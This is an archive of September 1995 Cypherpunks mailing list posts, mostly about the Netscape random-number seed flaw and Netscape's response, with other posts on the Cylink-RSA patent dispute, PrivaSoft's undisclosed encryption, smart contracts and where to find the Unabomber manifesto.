> PrivaSoft scrambles and descrambles an image of the document using Bitmap 
> encryption. When scrambling, PrivaSoft divides the document into tiny tiles
> and shuffles them pseudo-randomly using your secret key as part of the
> encryption algorithm.

This is an extremely general description of encryption and decryption. I am
interested in learning more about the cryptographic algorithms used in the
PrivaSoft product. Where should I look for further details ?  Are there
technical contacts within your organization who would be willing to discuss
this in email ?  References would be greatly appreciated.

Sincerely
-L. McCarthy <lmccarth@cs.umass.edu>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 19 Sep 95 13:06:26 PDT
To: cypherpunks@toad.com
Subject: netscape broken on NPR
Message-ID: <01HVGQF85HCY00038M@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


NPR reported on the security flaw in Netscape,

3:05 pm CDT.	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 12:10:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ASCII unabomber paper attribution and FTP address
In-Reply-To: <199509191821.OAA15570@grape-nuts.ai.mit.edu>
Message-ID: <9509191910.AA04919@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Lethin writes:
> N.B. unabomber paper is via JYA_lbr.  Also available via FTP
> 
> 	ftp://ftp.ai.mit.edu/users/misc/unabomber

Actually it's:

	ftp://ftp.ai.mit.edu/pub/users/misc/unabomber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 12:29:35 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <9509191929.AA15153@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Confirming suspicions that PrivaSoft is a security-through-obscurity outfit:

> From: David Clavadetscher <clav@deltanet.com>
> Subject: Re: Encryption algorithms used in PrivaSoft
> 
> Dear L.,
> 
> At this time our crypto engine is patented and proprietary. If you tell me
> the intent of your interest I will see what other information we can provide
> to you. Call me if you like.
[...]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Williams <bobw@netmanage.com>
Date: Tue, 19 Sep 95 15:45:11 PDT
To: cypherpunks@toad.com
Subject: NetManage - Cylink Press Announcement
Message-ID: <Chameleon.950919154529.bobw@BobwTest.netmanage.com>
MIME-Version: 1.0
Content-Type: text/plain


There are quite a few open issues regarding 
the reliability, interoperability, and licensing of
public key technology. 

All parties interested in access to code for testing and
comment please respond to this email address.  

Thanks

Bob
------------

NETMANAGE, Inc.
Press Release
FOR IMMEDIATE RELEASE

Contact: Donna Loughlin, NetManage, (408) 973-7171
         Donna@netmanage.com

NetManage Licenses Public Key Cryptography from CYLINK

The Two Firms to Promote an Open Interface for Internet Security which 
Corrects Flaws and Eliminates Financial and Interoperability Barriers for 
Cryptography.

Cupertino, California - September 19,  1995- NetManage, the leader in TCP/IP 
Applications for Windows and Internet productivity software, announced today 
that it has signed a licensing agreement with CYLINK Corporation for 
technology which incorporates the fundamental patents covering public 
key cryptography.   NetManage will be providing support for public key 
authentication and data encryption as a fundamental component of its 
Chameleon Enterprise strategy.  The two firms further announced that they 
plan to provide support for an open interface for Internet security which 
will address recent flaws found in cryptographic implementations used by 
Netscape Communications and other unpublicized security holes in existing 
Internet security protocols. The standard is further intended to eliminate 
the financial and interoperability barriers that have been holding back 
widespread use of public key cryptography on the Internet.

In a separate announcement released yesterday, CYLINK announced that it had 
prevailed in a patent lawsuit with RSA Data Security which found that RSA 
had infringed U.S. patents held by CYLINK which cover all known 
implementations of public key technology.

About Internet Security
----------------------- 
Establishing a secure Internet connection requires any computer software 
program to perform two functions: Authentication of the user, and bulk 
encryption of data.  

The Authentication phase allows two computers to verify that each party is 
who they claim to be, and that they are authorized to enter into a secure 
communications session.   This is done via 'public key' technology, which 
was developed and patented originally by Stanford University and licensed 
exclusively by CYLINK Corporation.

During the authentication phase the two computers also agree upon the 
encryption method to be used for bulk data transfer during the time the two 
computers are communicating data between one another.  These ciphers can be 
implemented in either software or hardware, including PCMCIA cards.  Popular 
encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and 
RC-4 and are available from a variety of software and hardware vendors.

Limitations of Current Internet Security Standards
--------------------------------------------------
Current implementations of security protocols proposed as standards by 
Netscape Communications and RSA Data Security, Inc. include security flaws 
and fail to fully accommodate open and interoperable secure communications 
between computers which use different bulk encryption ciphers.  These 
problems have limited the adoption of Internet security as a widespread 
interoperable feature of all Internet software and hardware products 
including end-user applications, servers, firewalls, and secure routers.

NetManage and CYLINK, along with other major software and hardware 
developers, will be announcing next week the release of a publicly available 
security implementation which allows for 'plug & play' interoperability for 
users of Internet security, and the endorsement of protocol extensions which 
improve the reliability of current proposed Internet security standards.  
This open implementation will not lock software or hardware developers into 
the use of encryption technology from any one vendor.

Related APIs, key exchange technology, and encryption will be made publicly 
available to other software and hardware developers.   Licensing will 
include source code and no per-copy royalty fees.

About NetManage
---------------
NetManage Inc., the fastest growing software company in the United States, 
develops, markets and supports an integrated set of Internet-based 
applications, servers and development tools for Microsoft Windows, Windows 
95 and Windows NT.  NetManage software allows corporations to facilitate 
communication, sharing of information and collaboration between workgroups 
using Internet technology. The company's award winning products include 
Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose 
shares are traded on the NASDAQ under the ticker symbol NETM.  Its products 
are sold world-wide by NetManage's direct sales force and authorized channel 
partners.

About CYLINK
------------
CYLINK Corporation is the world's largest provider of enterprise-wide 
network information security products and wireless communications.  CYLINK 
is the exclusive holder of the fundamental patents which broadly claim the 
invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and 
Hellman-Pohlig) and which were originally developed at Stanford University.  
Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, 
financial institutions and government agencies.  Licensees of CYLINK 
technology include CISCO Systems, and other prominent hardware and software 
developers.

# # #








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:38:35 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950919153502.8469C-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Perry E. Metzger wrote:

> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

Well, now that Cypherpunks have again shown yet another hole in Netscape 
security, I think we are in pretty good standing to demand

   ACCESS TO SOURCE CODE FOR NETSCAPE,

so we can work to help make Netscape "pretty good".  Any reporters 
listening?  

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 19 Sep 95 12:50:49 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (yes!)
In-Reply-To: <Pine.3.89.9509191530.B3082-0100000@offshore.com.ai>
Message-ID: <Pine.3.89.9509191523.A3155-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




> Perry E. Metzger
> Timothy C. May writes:
> > Power in St. Thomas may not be back for a year in some parts. The roads,
> > sewers, power lines, phone system, etc. will likely have to be completely
> > rebuilt.
> [...]
> > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> > they were a few months ago.
> 
> Not really. I suspect that phone company co-location and using buried
> lines and your own generator would probably fix most problems if you
> were "serious" about doing such a thing.

We are not so bad off down here.  Anguilla took a direct hit from Luis. 
Some of us have had to move computers into town for a week or two, but
that is really it.  Also, it has meant a couple weeks where we did not get
as much done, but not months of setback.  There is power and phone in
town, cell phones work (give me a ring at (809) 497-7255), generators are
not that expensive (like $600 for 5 kw). 

The utility poles have almost all been straightened or replaced already (2
weeks).  The high-tension lines have already been strung to many places
(like near my house).  Anguilla should be rewired within another 6 weeks
(we had the HMS South Hampton here for the last 2 weeks and now have 100
Royal Engineers helping out). 

Nobody was killed here.  We all have our own cisterns so we have water,
just bucket powered.  The places that were hit hard were poor areas that
some of the islands have, and people on boats.  Also, some other islands
will have water problems (not Anguilla).

   --  Vince Cate
       From Anguilla - A tax-haven in the Caribbean
                  (or as they like to say, a "Zero tax jurisdiction")
       http://www.offshore.com.ai/anguilla
       http://www.aibs.com.ai/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:44:12 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA and Netscape Crack (Re: NYT on Netscape Crack)
In-Reply-To: <ac8391c012021004b6fc@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950919154226.8469D-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Timothy C. May wrote:

> If the "flaws" are being found by our group, as John notes, just what is
> the NSA doing in the _second_ role it is supposed to have, its "COMSEC,"
> or communications security, role?

Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow 
mechanisms ;)

"I'm from the NSA, I'm here to help your crypto..."

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:46:05 PDT
To: Sal Denaro <Sal@panix.com>
Subject: Re: AOL monitoring
In-Reply-To: <+3OXwAgbBgzR084yn@panix.com>
Message-ID: <Pine.SUN.3.91.950919154430.8469E-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995, Sal Denaro wrote:

> 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600

Hmmm...potential new crypto product...a "secure" newsreader with encrypted
.newsrc? 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 16:09:49 PDT
To: cypherpunks@toad.com
Subject: netscape's response
Message-ID: <199509192304.QAA05546@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


" With this knowledge, an experienced computer programmer could
decrypt messages sent by Netscape Navigator to other computers in a
few hours of computation time."

	Excuse me? A few hours? Try 25 seconds??

"Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before
it is sent to customers."

	A group which offered to review the first version, but
Netscape refused.

	From their release it looks like they aren't finding a better
source of entropy, but just using *more* sources of entropy. Doesn't
mean that the entropy is good.
	A T-shirt to the first person to decompile the new Seed code
and post the sources of "entropy" used.

	(See http://www.c2.org/hacknetscape for general [not written
in stone] guidelines regarding t-shirt awards)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 13:09:56 PDT
To: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509191438.AA16172@toad.com>
Message-ID: <Pine.SUN.3.91.950919160626.8469G-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Eli Brandt wrote:

> It sounds as if Netscape thinks that public knowledge of the key
> generation is part of the problem.  I hope somebody on the security
> team convinces management that entropy is more important than publicity.

No matter what they say in the press, I doubt it will take more than a few
weeks to reverse engineer the new RNG seeder and figure out where the data
comes from. 

I am hoping it was more of a PR thing than a technical thing.  I hope 
that Netscape tells us their RNG seed so Cypherpunks don't have to go to all 
the trouble.  If they tell us, we can let them know if it is a reasonable 
mechanism or bogus.

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 13:24:15 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Investing on Information We Get Here
In-Reply-To: <ac843ff11a021004a43e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950919161828.8469I-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:

> P.S. On Netscape, I've finally decided to do some buying. Sure, this latest
> flaw is another embarrassment. But more deals and link-ups than ever are
> being inked, and they've got the resources to really spruce up Navigator
> and related products. I just don't see too many competitors on the horizon.

Let's not forget that Netscape is the biggest and best boon to the 
internet I've ever seen.  It is selling more bandwidth, servers, and 
dial-up IP than anything that has come down the road.  It is enabling 
people to put even more info on the net, and I love it!

Of course, that is why it was targeted for the 40-bit RC4 crack, its 
immense popularity.  The total bogosity of 40-bit keys is now pretty 
apparent, and it is helping moves to 64-bit export, and perhaps beyond.

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Tue, 19 Sep 95 17:11:55 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto + Economics + AI = Digital Money Economies
In-Reply-To: <v02120d05ac81b6f9f6a9@[199.0.65.105]>
Message-ID: <199509192326.QAA12334@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I wholeheartedly agree with Tim that economics should play an important
role in analyzing cryptographic protocols.  It lets us step back and
ask what features are important, and in general what we are trying to
accomplish: usually something very different than the military uses of
cryptography that have given rise to the current methodologies.
To economics, especially game theory, I add a vast body of knowledge 
about human relationships, especially those involving commerce, that 
civilization has accumulated over the years: law, especially business law.

If we step back and look at what many cypherpunks are trying to achieve,
a major idealistic theme is a Gandhian cyberspace where 
violence can only be make-believe, whether in Mortal Kombat or 
"flame wars".  Cypherpunks want our telephone networks, Internet businesses,
etc. to be both protected from force, and not dependent on force for
their existence. Our 20th century information commerce systems, from 
publishing to credit cards, have often been very dependent on the threat 
of violence, usually law enforcement, to protect intellectual property 
rights, deter fraud, collect debts, etc.  There is no utopia in sight where 
such threats can be completely eliminated, but we can recognize that they 
exist and carefully work to reduce our dependence on them.

In a far more practical vein, the dawn of international commercial
networks that criss-cross hundreds of jurisdictions with complex, obscure,
and often contradictory regulations, gives rise to a vast market
opportunity for substituting, where possible, network security mechanisms 
for law enforcement dependencies. The recent discoveries in 
cryptographic protocols provide us with a rich toolbox for
solving these problems.

Perhaps the most fundamental building block of business law is the
contract.   Strongly related to Tim's ontology of money is an 
area I have developed quite extensively called _smart contracts_.
The terms of contractual relationships can often be formalized
and standardized, and then performed via network-based protocols.  
These protocols, along with economic incentives, protect the performance of 
the contract from both fraud by the principals and attack from third 
parties.  This is also the basic task of law enforcement in commercial law;
thus smart contracts when successful reduce dependence on law enforcement
as well as losses to fraud and cracking.  Of special interest to 
cryptologists is that the principles of contract provide us with a 
methodology for the use of cryptography that is very different from,
and potentially far more lucrative than, the traditional military paradigm.

I have much more to say about these things in my essays under
http://www.digicash.com/~nick/, and in a forthcoming article
for _Extropy_.

Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 19 Sep 95 07:32:20 PDT
To: cypherpunks@toad.com
Subject: (Yet Another?) Netscape Crack Web page
Message-ID: <9509191431.AA23188@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I've been waiting to see here an announcement of some web page toward
which to direct people who want more info on the great (congrats) job
from Ian and David, but as I saw none (maybe it's on its way, delays
seem pretty high these days on the list mail, in that case, sorry...)
and someone asked me for more info on my sources,... I've set up a small
web page with some info collected here on

  http://hplyot.obspm.fr/~dl/netscapesec/

It includes a few remote pointers, a copy of Ian's original post,
the NYT article, the Wall Street Journal one, and... the source file
that I received from a European source (and incidentally a summary from
me in French)

Please send me comments, corrections, additional pointers,... (it is
not meant to be exhaustive anyway)

Best regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 19 Sep 95 14:40:09 PDT
To: cypherpunks@toad.com
Subject: Netscape responds.
Message-ID: <9509192139.AA21854@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Netscape now has an article on their home page about the 
latest break in their security.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 19 Sep 95 14:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: ASCII unabomber paper attribution and FTP address (fwd)
Message-ID: <199509192140.QAA02210@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: lmccarth@cs.umass.edu (L. McCarthy)
> Subject: Re: ASCII unabomber paper attribution and FTP address
> Date: Tue, 19 Sep 1995 15:10:48 -0400 (EDT)
> 
> Actually it's:
> 
> 	ftp://ftp.ai.mit.edu/pub/users/misc/unabomber
> 
> 


It isn't as of 4:28 Central...:(

Anyone got a clue as to where it has flown to?

                                               Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Tue, 19 Sep 95 16:36:28 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Unabomber ?
In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.950919164123.18472A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, John Young wrote:

> I'm scanning it now and will offer it in a while -- it's a 
> long, long pole.
> 
> 
> I'll ask by this post if someone wants to offer it FTP, I can 
> only do multiple e-mail bites from this hole.

I'm willing to put it on my home page


--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 15:10:11 PDT
To: cypherpunks@toad.com
Subject: Re: Cylink
Message-ID: <9509192145.AA01100@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


anonymous claims the WSJ said:
>  The arbitrators ruled that RSA hasn't had the right to sublicense
>  the Stanford patents since 1990.
>
>  Cylink said it would seek royalties from companies that have licensed
>  software code from RSA and are redistributing it, arguing that they
>  are infringing the Stanford patents.

hahahaha, this is funny if it's true...  Anyone know which two patents they  
are referring to? (diffie-hellman and merkle-hellman?)

Any ideas on how this will change the legal status of RSAREF and PGP?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 17:07:59 PDT
To: cypherpunks@toad.com
Subject: http://www.c2.org/hacknetscape/critique.phtml
Message-ID: <199509200002.RAA10459@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My response to netscape's press release.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 14:10:50 PDT
To: cypherpunks@toad.com
Subject: SUP_con
Message-ID: <199509192103.RAA01374@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-19-95. WashRag:


   "U.S. Agencies at Odds On Computer Exports."

      The State, Commerce and Defense departments are pushing
      for a loosening of federal controls on the export of
      U.S. supercomputers to all but a few developing nations,
      a move that would put extraordinary computing power into
      the hands of governments that have long been denied it.
      The proposal also has collected strong support from the
      computer industry but has provoked criticism from the
      Energy Department and the Arms Control and Disarmament
      Agency. Advocates of the plan want President Clinton to
      announce the new, weaker export limits during a proposed
      visit to a computer factory in California's Silicon
      Valley on Thursday. [No crypto mentioned.]


   "French Nuclear Program Closely Tied to U.S. Sharing of
   Sensitive Codes, Access to California Labs to Expand."

      Despite its claims of developing an independent nuclear
      deterrent, France has long relied on the U.S. for some
      of the most sophisticated technologies needed to upgrade
      and maintain a modern nuclear arsenal. Although known to
      specialists, the U.S.-French nuclear links have been
      little discussed over the years. Officials are currently
      trying to negotiate an arrangement under which the
      two sides will begin to share sensitive computer codes
      that describe how bombs behave when they are detonated.
      France needs the data to make full use of access to two
      sophisticated new U.S. nuclear weapons research
      facilities that Washington has quietly offered French
      weapons experts.


   Deux: SUP_con  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Tue, 19 Sep 95 14:12:16 PDT
To: cypherpunks@toad.com
Subject: Cylink
Message-ID: <199509192112.RAA10595@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


WSJ, Sept 19, 1995.

Cylink Claims Right To Key Technology Involving
Encryption


Sunnyvale, Calif. - A Silicon Valley company asserted a
legal claim to a key technology for protecting electronic
commerce, following an arbitration ruling.

Closely held Cylink Corp. said the ruling gave back to
the company control over two key Stanford University
patents regarding public-key encryption, a technique for
scrambling data from theft or eavesdropping. A panel of
three arbitrators, asked to settle a dispute between
Cylink and RSA Data Security Inc., dissolved a five-year
partnership between the two that pooled their encryption
patents.

RSA, a closely held company based in Redwood City,
Calif., is the dominant supplier of encryption software,
with users that include Microsoft Corp., Novell Inc.,
Netscape Communications Corp., Apple Computer Inc. and
International Business Machines Corp. The arbitrators
ruled that RSA hasn't had the right to sublicense the
Stanford patents since 1990.

Cylink said it would seek royalties from companies that
have licensed software code from RSA and are
redistributing it, arguing that they are infringing the
Stanford patents.

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Sep 95 14:16:58 PDT
To: www-buyinfo@allegra.att.com
Subject: Financial Services Technology Consortium
Message-ID: <v02120d0dac84e026ebdb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


A friend found this...

Cheers,
Bob Hettinga

--- begin forwarded text
Bob:

  I was looking for a web site for Shawmut/Fleet Bank and could
not find one.  But I did come across this which I thought might
be of particular interest to you...

            http://www.llnl.gov/fstc/index.html

It is the Financial Services Technology Consortium (FSTC), which is a
consortium of financial services providers, national laboratories,
universities, and government agencies who sponsor and participate in
non-competitive collaborative research and development on interbank
technical projects.

Cheers,
Will


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 14:32:13 PDT
To: cypherpunks@toad.com
Subject: Una FTPaper 2
Message-ID: <199509192132.RAA04891@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain




     ftp.hacktic.nl/pub/incoming/unabomb.txt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 17:40:50 PDT
To: AndrewR@beetle.vironix.co.za (Andrew Roos)
Subject: Re: A Netscape Server implementation error
In-Reply-To: <305F486F@beetle.vironix.co.za>
Message-ID: <199509200035.RAA13361@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Hi Sameer
> 
> Thanks in advance for the T-shirt, and I like the Web site. On the   

	My pleasure. ;-)

> Although this is not nearly as important a result as Ian and Davids, it   
> is the first server hack, so can I have another T shirt?  :-)


	But you're already getting a T-shirt. (This looks like a place
where a 'nym could come in handy ;-) I've done a little bit more in
terms of outlining the requirements to win a t-shirt on the web page--
actual working code is an important criterion.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Tue, 19 Sep 95 17:52:35 PDT
To: cypherpunks@toad.com
Subject: Netscape on randseed issue
Message-ID: <v03003201ac8514fbce6d@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


Netscape has put up an official response to the randseed issue:

<http://home.netscape.com/newsref/std/random_seed_security.html>

Most interesting to me was the para:

"Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before it
is sent to customers. These experts will validate Netscape's solution
and insure that it is complete and effective in solving this
vulnerability. The group will be used on an ongoing basis to work with
Netscape's internal security experts to review the design and
implementation of security in Netscape's products and to provide an
additional measure of assurance that these products implement the
highest levels of security possible."

Anyone know anything about this group, or is this a reference to the
RSADSI source review that Andrew Loewenstern mentioned earlier today?


________________________________________________________________________
Stephan Somogyi            Think Tank Grenadier            Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 09:55:48 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <155.9509191654@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> Jeff Weinstein <jsw@neon.netscape.com> writes:
> >    Regardless of what Markoff implies, we do not intend to depend
> >  on security through obscurity.
> 
> Oh, can we now expect to see source to at least the security portions of  
> Navigator and the Commerce server?

An excellent proposal.

Well how about it Jeff/netscape?

Save Ian and David the effort of reverse engineering it again (which
it is obviously pointless, and more: mathematically impossible, to do),
and get yourself some free advice.  Better to have free advice, and
quickly now, rather than another disaster later; presume Netscape's
cred can't take too many more bashings before this starts affecting
share prices etc.

Posting the code for the random number generator would be an excellent
start.  Kirkov (sp?) principle and all.  Or if that doesn't sit well
with copyright interests, how about writing up an open spec about how
the random number generator works?  Then we can critique it.  An
algorithm should be something to be proud of, "it's secure, and see:
this is how it works, here are the design criteria, here is how you
would attempt to break it, and here is the best predicted attack's
cost."

Let's get something useful out of this, an open system is called for
not just a quick switcheroo of another algorithm.  Open systems, rule!
(I thought netscape was big on open systems, reading some of the
blurb, just now).

I'm sure you'd get some useful, valuable feedback from publishing an
open spec, is netscape still a progressive startup company with hot
programmers running the show, or has it slipped into stuffy corporate
realms already?

Respectfully,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Tue, 19 Sep 95 14:56:15 PDT
To: rsalz@osf.org>
Subject: Re: Netscape's random numbers
Message-ID: <9508198115.AA811559884@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain



      Congrats, nice job!
      
      The Netscape license explicitly prohibits decompiling (except where such 
      prohibition is illegal).  When this hits the media it will be important to 
      avoid being tarred with the "hacker breaks rules and breaks in" brush. 
      More subtly, it's probably a bad idea to call into question the overall 
      business model of client binaries on the net.
     
So.  At least they're honest and let everybody know.


      Instead, emphasize importance of open code, public reviews, ability to 
      link in your own code that meets public specs, etc.  All of these things 
      the Internet was designed to do, and U.S. ITAR regulations are designed to 
      prohibit (globally, anyway).  And also that the bad guys will never play 
      by the rules.  And re-emphasize that solutions are possible, just that the 
      U.S. government prevents them from being deployed in a global economy.
      
      
Hear, hear!

      Perhaps draw parallels to the recent Microsoft Word virus.
      
      /r$
      
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=

W.S. "Skip" Harborth
Manager & Senior Engineer
Information Systems Security Engineering
Houston Associates,  Incorporated
4601 North Fairfax Dr, Suite 1001
Arlington, Virginia  22203    USA
(703) 284-8732     812-5099 (fax)
sharborth@hai-net.com


The opinions expressed are my own and have no relation to my employer.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 19 Sep 95 10:14:30 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995, Brian Davis wrote:

> Phill obviously presents one point of view, vigorously and well.  What do 
> the rest of you think about a teen who, say, busts into a .edu site, 
> plays with the files, and ultimately brings the system down entirely for 
> 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> him?  Have a TLA hire him???

